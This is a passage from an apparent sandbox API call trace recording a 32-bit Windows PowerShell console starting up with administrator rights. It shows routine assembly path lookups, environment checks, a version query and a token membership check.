lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0042.470] GetLastError () returned 0x2 [0042.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0042.470] GetLastError () returned 0x2 [0042.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.500] GetLastError () returned 0xcb [0042.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.500] GetLastError () returned 0xcb [0042.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.501] GetLastError () returned 0xcb [0042.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.529] GetLastError () returned 0xcb [0042.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x25e2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0042.569] GetLastError () returned 0x2 [0042.569] SetErrorMode (uMode=0x1) returned 0x1 [0042.569] GetFileAttributesExW (in: lpFileName="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x25e754 | out: lpFileInformation=0x25e754*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.570] GetLastError () returned 0x2 [0042.570] SetErrorMode (uMode=0x1) returned 0x1 [0042.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.717] GetLastError () returned 0x0 [0042.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.717] GetLastError () returned 0x0 [0042.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.718] GetLastError () returned 0x0 [0042.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.719] GetLastError () returned 0xcb [0042.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.721] GetLastError () returned 0xcb [0042.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.722] GetLastError () returned 0xcb [0042.727] CoCreateGuid (in: pguid=0x25e834 | out: pguid=0x25e834*(Data1=0xb428d9ba, Data2=0x8c20, Data3=0x4338, Data4=([0]=0xa9, [1]=0x3e, [2]=0xe8, [3]=0x5a, [4]=0x6b, [5]=0xd5, [6]=0xf5, [7]=0x3c))) returned 0x0 [0042.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.730] GetLastError () returned 0xcb [0042.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.732] GetLastError () returned 0xcb [0042.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.733] GetLastError () returned 0xcb [0042.738] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0042.738] GetLastError () returned 0x0 [0042.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x25e714 | out: lpConsoleScreenBufferInfo=0x25e714) returned 1 [0042.739] GetLastError () returned 0x0 [0042.742] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0042.742] GetLastError () returned 0x0 [0042.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x25e714 | out: lpConsoleScreenBufferInfo=0x25e714) returned 1 [0042.742] GetLastError () returned 0x0 [0042.743] GetVersionExW (in: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0042.743] GetLastError () returned 0x0 [0042.744] GetCurrentProcess () returned 0xffffffff [0042.744] GetLastError () returned 0x3f0 [0042.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x25e724 | out: TokenHandle=0x25e724*=0x338) returned 1 [0042.744] GetLastError () returned 0x3f0 [0042.746] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e77c | out: TokenInformation=0x0, ReturnLength=0x25e77c) returned 0 [0042.746] GetLastError () returned 0x7a [0042.746] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x5dde38, TokenInformationLength=0x4, ReturnLength=0x25e77c | out: TokenInformation=0x5dde38, ReturnLength=0x25e77c) returned 1 [0042.746] GetLastError () returned 0x7a [0042.747] DuplicateTokenEx (in: hExistingToken=0x338, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x25e734 | out: phNewToken=0x25e734*=0x330) returned 1 [0042.747] GetLastError () returned 0x7f [0042.747] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25e77c | out: TokenInformation=0x0, ReturnLength=0x25e77c) returned 0 [0042.747] GetLastError () returned 0x7a [0042.747] GetTokenInformation (in: TokenHandle=0x338, TokenInformationClass=0x8, TokenInformation=0x5dde18, TokenInformationLength=0x4, ReturnLength=0x25e77c | out: TokenInformation=0x5dde18, ReturnLength=0x25e77c) returned 1 [0042.747] GetLastError () returned 0x7a [0042.747] CheckTokenMembership (in: TokenHandle=0x330, SidToCheck=0x2bf0b28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x25e710 | out: IsMember=0x25e710) returned 1 [0042.747] GetLastError () returned 0x7a [0042.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.748] GetLastError () returned 0x7a [0042.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.748] GetLastError () returned 0x7a [0042.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.748] GetLastError () returned 0x7a [0042.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.748] GetLastError () returned 0x7a [0042.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.756] GetLastError () returned 0x7a [0042.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.756] GetLastError () returned 0x7a [0042.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.756] GetLastError () returned 0x7a [0042.778] GetConsoleTitleW (in: lpConsoleTitle=0x54ea60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") returned 0x39 [0042.778] GetLastError () returned 0x7a [0042.807] GetConsoleTitleW (in: lpConsoleTitle=0x54ea60, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") returned 0x39 [0042.807] GetLastError () returned 0x7a [0042.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.807] GetLastError () returned 0x7a [0042.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.807] GetLastError () returned 0x7a [0042.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.807] GetLastError () returned 0x7a [0042.808] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") returned 1 [0042.809] GetLastError () returned 0x7a [0042.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.809] GetLastError () returned 0x7a [0042.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.809] GetLastError () returned 0x7a [0042.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.809] GetLastError () returned 0x7a [0042.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.809] GetLastError () returned 0x7a [0042.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.813] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.814] GetLastError () returned 0x7a [0042.829] SetConsoleCtrlHandler (HandlerRoutine=0x1ee384a, Add=1) returned 1 [0042.829] GetLastError () returned 0x7a [0042.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330 [0042.856] GetLastError () returned 0x0 [0042.857] CoCreateGuid (in: pguid=0x25e748 | out: pguid=0x25e748*(Data1=0x7e2aa281, Data2=0xfdb, Data3=0x4089, Data4=([0]=0x8d, [1]=0x1f, [2]=0x71, [3]=0xe9, [4]=0xf2, [5]=0x3d, [6]=0xca, [7]=0x8d))) returned 0x0 [0042.889] WinSqmIsOptedIn () returned 0x0 [0042.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.890] GetLastError () returned 0xcb [0042.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.891] GetLastError () returned 0xcb [0042.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.892] GetLastError () returned 0xcb [0042.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.892] GetLastError () returned 0xcb [0042.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.892] GetLastError () returned 0xcb [0042.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.893] GetLastError () returned 0xcb [0042.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.893] GetLastError () returned 0xcb [0042.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.893] GetLastError () returned 0xcb [0042.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0042.895] GetLastError () returned 0xcb [0043.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.144] GetLastError () returned 0xcb [0043.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.144] GetLastError () returned 0xcb [0043.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.144] GetLastError () returned 0xcb [0043.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.144] GetLastError () returned 0xcb [0043.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: 